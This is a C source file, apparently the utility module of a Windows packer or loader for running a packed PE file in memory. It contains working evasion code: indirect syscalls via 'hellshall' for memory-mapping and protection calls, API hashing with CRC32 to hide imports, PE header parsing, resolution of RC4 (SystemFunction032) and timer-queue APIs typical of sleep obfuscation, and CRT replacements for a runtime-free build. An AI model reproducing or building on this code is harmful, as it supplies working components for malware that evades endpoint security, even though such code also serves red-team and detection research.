#include <Windows.h>

#include "Common.h"
#include "Debug.h"


//-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
//-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
//-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
/*
*   Initialize an input 'NT_API' struct that will contain all required information to execute a syscall via hellshall 
*/
BOOL InitIndirectSyscalls(OUT PNT_API Nt)
{

    if (Nt->bInit)
        return TRUE;

    if (!FetchNtSyscall(NtOpenSection_CRC32, &Nt->NtOpenSection)) {
#ifdef DEBUG
        PRINT("[!] Failed To Initialize \"NtOpenSection\" - %s.%d \n", GET_FILENAME(__FILE__), __LINE__);
#endif
        return FALSE;
    }

    if (!FetchNtSyscall(NtMapViewOfSection_CRC32, &Nt->NtMapViewOfSection)) {
#ifdef DEBUG
        PRINT("[!] Failed To Initialize \"NtMapViewOfSection\" - %s.%d \n", GET_FILENAME(__FILE__), __LINE__);
#endif
        return FALSE;
    }

    if (!FetchNtSyscall(NtUnmapViewOfSection_CRC32, &Nt->NtUnmapViewOfSection)) {
#ifdef DEBUG
        PRINT("[!] Failed To Initialize \"NtUnmapViewOfSection\" - %s.%d \n", GET_FILENAME(__FILE__), __LINE__);
#endif
        return FALSE;
    }

    if (!FetchNtSyscall(NtAllocateVirtualMemory_CRC32, &Nt->NtAllocateVirtualMemory)) {
#ifdef DEBUG
        PRINT("[!] Failed To Initialize \"NtAllocateVirtualMemory\" - %s.%d \n", GET_FILENAME(__FILE__), __LINE__);
#endif
        return FALSE;
    }

    if (!FetchNtSyscall(NtProtectVirtualMemory_CRC32, &Nt->NtProtectVirtualMemory)) {
#ifdef DEBUG
        PRINT("[!] Failed To Initialize \"NtProtectVirtualMemory\" - %s.%d \n", GET_FILENAME(__FILE__), __LINE__);
#endif
        return FALSE;
    }

    if (!FetchNtSyscall(NtFlushInstructionCache_CRC32, &Nt->NtFlushInstructionCache)) {
#ifdef DEBUG
        PRINT("[!] Failed To Initialize \"NtFlushInstructionCache\" - %s.%d \n", GET_FILENAME(__FILE__), __LINE__);
#endif
        return FALSE;
    }

#ifdef DEBUG
    PRINT("[V] NtOpenSection [ SSN: 0x%0.8X - 'syscall' Address: 0x%p ] \n", Nt->NtOpenSection.dwSSn, Nt->NtOpenSection.pSyscallInstAddress);
    PRINT("[V] NtMapViewOfSection [ SSN: 0x%0.8X - 'syscall' Address: 0x%p ] \n", Nt->NtMapViewOfSection.dwSSn, Nt->NtMapViewOfSection.pSyscallInstAddress);
    PRINT("[V] NtUnmapViewOfSection [ SSN: 0x%0.8X - 'syscall' Address: 0x%p ] \n", Nt->NtUnmapViewOfSection.dwSSn, Nt->NtUnmapViewOfSection.pSyscallInstAddress);
    PRINT("[V] NtAllocateVirtualMemory [ SSN: 0x%0.8X - 'syscall' Address: 0x%p ] \n", Nt->NtAllocateVirtualMemory.dwSSn, Nt->NtAllocateVirtualMemory.pSyscallInstAddress);
    PRINT("[V] NtProtectVirtualMemory [ SSN: 0x%0.8X - 'syscall' Address: 0x%p ] \n", Nt->NtProtectVirtualMemory.dwSSn, Nt->NtProtectVirtualMemory.pSyscallInstAddress);
    PRINT("[V] NtFlushInstructionCache [ SSN: 0x%0.8X - 'syscall' Address: 0x%p ] \n", Nt->NtFlushInstructionCache.dwSSn, Nt->NtFlushInstructionCache.pSyscallInstAddress);
#endif 

    Nt->bInit = TRUE;

    return TRUE;
}


//-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
//-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
//-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
/*
*   Initialize an input 'WINAPIs' struct that will contain all required information to execute a WinAPI through Api hashing
*/
BOOL InitializeWinAPIs(OUT PWINAPIs pWinAPIs) 
{
    // LoadLibraryA should always be the first API to resolve (it's used in GetProcAddressH in case of a forwarded function)
    if (!(pWinAPIs->pLoadLibraryA = GetProcAddressH(GetModuleHandleH(kernel32dll_CRC32), LoadLibraryA_CRC32))) {
#ifdef DEBUG
        PRINT("[!] Failed To Resolve LoadLibraryA's Address - %s.%d \n", GET_FILENAME(__FILE__), __LINE__);
#endif
        return FALSE;
    }

    if (!(pWinAPIs->pAddVectoredExceptionHandler = GetProcAddressH(GetModuleHandleH(kernel32dll_CRC32), AddVectoredExceptionHandler_CRC32))) {
#ifdef DEBUG
        PRINT("[!] Failed To Resolve AddVectoredExceptionHandler's Address - %s.%d \n", GET_FILENAME(__FILE__), __LINE__);
#endif
        return FALSE;
    }

    if (!(pWinAPIs->pRemoveVectoredExceptionHandler = GetProcAddressH(GetModuleHandleH(kernel32dll_CRC32), RemoveVectoredExceptionHandler_CRC32))) {
#ifdef DEBUG
        PRINT("[!] Failed To Resolve RemoveVectoredExceptionHandler's Address - %s.%d \n", GET_FILENAME(__FILE__), __LINE__);
#endif
        return FALSE;
    }

/*
    if (!(pWinAPIs->pVirtualProtect = GetProcAddressH(GetModuleHandleH(kernel32dll_CRC32), VirtualProtect_CRC32))) {
#ifdef DEBUG
        PRINT("[!] Failed To Resolve VirtualProtect's Address - %s.%d \n", GET_FILENAME(__FILE__), __LINE__);
#endif
        return FALSE;
    }
*/

    if (!(pWinAPIs->pCreateTimerQueue = GetProcAddressH(GetModuleHandleH(kernel32dll_CRC32), CreateTimerQueue_CRC32))) {
#ifdef DEBUG
        PRINT("[!] Failed To Resolve CreateTimerQueue's Address - %s.%d \n", GET_FILENAME(__FILE__), __LINE__);
#endif
        return FALSE;
    }

    if (!(pWinAPIs->pCreateTimerQueueTimer = GetProcAddressH(GetModuleHandleH(kernel32dll_CRC32), CreateTimerQueueTimer_CRC32))) {
#ifdef DEBUG
        PRINT("[!] Failed To Resolve CreateTimerQueueTimer's Address - %s.%d \n", GET_FILENAME(__FILE__), __LINE__);
#endif
        return FALSE;
    }

    if (!(pWinAPIs->pRtlAddFunctionTable = GetProcAddressH(GetModuleHandleH(kernel32dll_CRC32), RtlAddFunctionTable_CRC32))) {
#ifdef DEBUG
        PRINT("[!] Failed To Resolve RtlAddFunctionTable's Address - %s.%d \n", GET_FILENAME(__FILE__), __LINE__);
#endif
        return FALSE;
    }

    if (!(pWinAPIs->pInitializeCriticalSection = GetProcAddressH(GetModuleHandleH(kernel32dll_CRC32), InitializeCriticalSection_CRC32))) {
#ifdef DEBUG
        PRINT("[!] Failed To Resolve InitializeCriticalSection's Address - %s.%d \n", GET_FILENAME(__FILE__), __LINE__);
#endif
        return FALSE;
    }

    if (!(pWinAPIs->pEnterCriticalSection = GetProcAddressH(GetModuleHandleH(kernel32dll_CRC32), EnterCriticalSection_CRC32))) {
#ifdef DEBUG
        PRINT("[!] Failed To Resolve EnterCriticalSection's Address - %s.%d \n", GET_FILENAME(__FILE__), __LINE__);
#endif
        return FALSE;
    }

    if (!(pWinAPIs->pLeaveCriticalSection = GetProcAddressH(GetModuleHandleH(kernel32dll_CRC32), LeaveCriticalSection_CRC32))) {
#ifdef DEBUG
        PRINT("[!] Failed To Resolve LeaveCriticalSection's Address - %s.%d \n", GET_FILENAME(__FILE__), __LINE__);
#endif
        return FALSE;
    }

    if (!(pWinAPIs->pSystemFunction032 = GetProcAddressH(GetModuleHandleH(advapi32dll_CRC32), SystemFunction032_CRC32))) {
#ifdef DEBUG
        PRINT("[!] Failed To Resolve SystemFunction032's Address - %s.%d \n", GET_FILENAME(__FILE__), __LINE__);
#endif
        return FALSE;
    }

    return TRUE;
}


//-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
//-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
//-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
/*
*   Initialize an input 'PE_HDRS' struct that will contain all required information about the packed PE file to get executed
*/
BOOL InitializePeStruct(OUT PPE_HDRS pPeHdrs, IN PBYTE pFileBuffer, IN DWORD dwFileSize)
{

    if (!pPeHdrs || !pFileBuffer || !dwFileSize)
        return FALSE;

    pPeHdrs->pFileBuffer    = pFileBuffer;
    pPeHdrs->dwFileSize     = dwFileSize;
    pPeHdrs->pImgNtHdrs     = (PIMAGE_NT_HEADERS)(pFileBuffer + ((PIMAGE_DOS_HEADER)pFileBuffer)->e_lfanew);

    if (pPeHdrs->pImgNtHdrs->Signature != IMAGE_NT_SIGNATURE)
        return FALSE;

    pPeHdrs->bIsDLLFile             = (pPeHdrs->pImgNtHdrs->FileHeader.Characteristics & IMAGE_FILE_DLL) ? TRUE : FALSE;
    pPeHdrs->pImgSecHdr             = IMAGE_FIRST_SECTION(pPeHdrs->pImgNtHdrs);
    pPeHdrs->pEntryImportDataDir    = &pPeHdrs->pImgNtHdrs->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT];
    pPeHdrs->pEntryBaseRelocDataDir = &pPeHdrs->pImgNtHdrs->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC];
    pPeHdrs->pEntryTLSDataDir       = &pPeHdrs->pImgNtHdrs->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_TLS];
    pPeHdrs->pEntryExceptionDataDir = &pPeHdrs->pImgNtHdrs->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXCEPTION];
    pPeHdrs->pEntryExportDataDir    = &pPeHdrs->pImgNtHdrs->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT];

    return TRUE;
}


//-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
//-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
//-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

/*
*   An implementation of the 'Cyclic redundancy check' string hashing algorithm
*   From :  https://stackoverflow.com/a/21001712
*/

UINT32 CRC32B(LPCSTR cString)
{

    UINT32      uMask = 0x00,
                uHash = 0xFFFFEFFF;
    INT         i = 0x00;

    while (cString[i] != 0) {

        uHash = uHash ^ (UINT32)cString[i];

        for (int ii = 0; ii < 8; ii++) {

            uMask = -1 * (uHash & 1);
            uHash = (uHash >> 1) ^ (CRC_POLYNOMIAL & uMask);
        }

        i++;
    }

    return ~uHash;
}


//-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
//-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
//-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

/*
*   Custom random number generator using XORshift algorithm
*/
unsigned int GenerateRandomInt()
{
    static unsigned int state = 123456789;
    state ^= state << 13;
    state ^= state >> 17;
    state ^= state << 5;
    return state;
}


//-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
//-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
//-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
/*
*   Replaces the 'wcscat' function
*/
VOID Wcscat(IN WCHAR* pDest, IN WCHAR* pSource)
{

    while (*pDest != 0)
        pDest++;

    while (*pSource != 0) {
        *pDest = *pSource;
        pDest++;
        pSource++;
    }

    *pDest = 0;
}


//-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
//-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
//-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
/*
*   Replaces the 'memcpy' function
*/
VOID Memcpy(IN PVOID pDestination, IN PVOID pSource, SIZE_T sLength)
{

    PBYTE D = (PBYTE)pDestination;
    PBYTE S = (PBYTE)pSource;

    while (sLength--)
        *D++ = *S++;
}


//-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
//-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
//-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
// After removing CRT:

// Replaces 'memset' while compiling
extern void* __cdecl memset(void*, int, size_t);

#pragma intrinsic(memset)
#pragma function(memset)
void* __cdecl memset(void* pTarget, int value, size_t cbTarget) {
    unsigned char* p = (unsigned char*)pTarget;
    while (cbTarget-- > 0) {
        *p++ = (unsigned char)value;
    }
    return pTarget;
}


// Replaces 'strrchr' while compiling. 'strrchr' is called from the 'GET_FILENAME' macro located in the 'Debug.h' file
extern void* __cdecl strrchr(const char*, int);

#pragma intrinsic(strrchr)
#pragma function(strrchr)
char* strrchr(const char* str, int c) {
    char* last_occurrence = NULL;
    while (*str) {
        if (*str == c) {
            last_occurrence = (char*)str;
        }
        str++;
    }

    return last_occurrence;
}